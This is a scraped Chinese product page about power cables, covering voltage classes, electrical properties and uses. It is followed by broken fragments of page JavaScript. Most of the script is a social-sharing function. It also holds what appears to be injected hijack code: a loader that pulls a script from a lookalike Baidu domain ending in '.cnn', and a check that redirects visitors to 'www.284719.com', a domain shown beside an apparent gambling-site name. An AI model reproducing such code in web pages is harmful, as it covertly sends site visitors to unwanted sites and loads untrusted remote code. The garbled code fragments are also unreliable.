电力电缆是在电力系统的主干线路中用以传输和分配大功率电能的电缆产品,包括1-500KV以及以上各种电压等级,各种绝缘的电力电缆。
产品性能:
电力电缆最基本性能是是电性能,由于电力电缆在高电压下工作,因此对电性能要求是多方面的,也是极为严格的,在设计电缆时必须对电性能精确计算,并依此作为选择材料和结构的依据。电气性能主要包括:导体的直流电阻和交流电阻,绝缘层的绝缘电阻,电缆的电容、电感,介质损耗和击穿强度。除此还有耐热性能、机械性能,以及因电缆种类不同而具有特殊性能。电力电缆这些性能不仅取决于电缆结构,所用原材料性能,并与电缆制造工艺和质量有密切关系。
应用场合:
电力电缆是用于传输和分配电能的电缆,电力电缆常用于城市地下电网、发电站引出线路、工矿企业内部供电及过江海水下输电线。
else {
bp.src = 'http://push.zhanzhang.baidu.cnn/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
)();
if (document.location.host.indexOf("ybzhan.cn")==-1 && document.location.host.indexOf("192.168.")==-1 && document.location.host.indexOf("10.115.")==-1) {
location.href = location.href.replace(document.location.host, 'www.284719.com');
九五至尊网站
分享至
function share(types) {
var title, imageUrl, url, description, keywords;
//获取文章标题
title = document.title;
//获取隐藏域中的图片地址
try {
imageUrl = document.getElementById("shareimg").innerHTML;
catch (e) {
imageUrl = "";
//假如图片为空获取网页中的第一张图片地址作为分享图
if (imageUrl == "") {
try {
imageUrl = document.images[0].src;
catch (e) {
imageUrl = "";
//获取当前网页url
url = document.location.href;
url = url.replace("html#", "html");
try {
//获取网页描述
description = document.querySelector('meta[name="description"]').getAttribute('content');
catch (e) {
description = "";
try {
//获取网页关键字
keywords = document.querySelector('meta[name="keywords"]').getAttribute('content');
catch (e) {
keywords = "";
//qq空间接口的传参
if (types == 'qzone') {
window.open('https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' + url + '&title=' + title + '&pics=' + imageUrl + '&summary=' + description);
//新浪微博接口的传参
if (types == 'weibo') {
window.open('http://service.weibo.com/share/share.php?appkey=583395093&url=' + url + '&title=' + title + '&pic=' + imageUrl);
// //qq好友接口的传参
// if (types == 'qqim') {
// window.open('http://connect.qq.com/widget/shareqq/index.html?url=' + url + '&title=' + title + '&pics=' + imageUrl + '&summary=' + description + '&desc=' + keywords);
//
//生成二维码给微信扫描分享
if (types == 'weixin' || types == 'qqim') {
//在线二维码(服务器性能限制,仅测试使用,屏蔽非大陆ip访问)
url = url.replace(/-/g, "%2D");
window.open('https://www.a-bm.cn/share.aspx?types=' + types + '&url=' + url);
document.write("")